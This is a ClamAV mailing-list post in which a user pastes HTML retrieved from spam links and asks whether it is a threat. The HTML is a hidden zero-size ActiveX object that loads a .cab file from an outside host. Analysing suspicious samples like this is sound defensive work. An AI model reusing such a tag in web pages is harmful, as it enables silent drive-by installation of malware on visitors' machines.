I've been getting some persistent emails that I thought were just spams, but out of curiosity I decided to wget some of the links from the spam. After a redirect or two, this is the html that was retrieved:
<OBJECT id=msxml20ms1 style="LEFT: 0px; TOP: 0px" ondataavailable="" classid="clsid:65431623-C69F-410E-A392-6360366CAC19" codebase="http://www.linemovie.com/line/user2/msxml20.cab#version=1,0,0,1"; VIEWASTEXT width=0 height=0> <PARAM NAME="_Version" VALUE="65536"> <PARAM NAME="_ExtentX" VALUE="2646"> <PARAM NAME="_ExtentY" VALUE="1323"> <PARAM NAME="_StockProps" VALUE="0"> </OBJECT> I'm not up on all of the exploits for the browsers, but I'm suspicious of this because it looks to me like it's trying to hide at the top left of the screen. I've downloaded the .cab file and clamav doesn't see anything wrong with it. Google doesn't find any answers about the clsid string in use. Ideas? Should I seek counseling for being too paranoid, or is this actually an unknown threat? Thanks, -ron ------------------------------------------------------- This SF.Net email is sponsored by: Oracle 10g Get certified on the hottest thing ever to hit the market... Oracle 10g. Take an Oracle 10g class now, and we'll give you the exam FREE. http://ads.osdn.com/?ad_id=3149&alloc_id=8166&op=click _______________________________________________ Clamav-users mailing list [EMAIL PROTECTED] https://lists.sourceforge.net/lists/listinfo/clamav-users
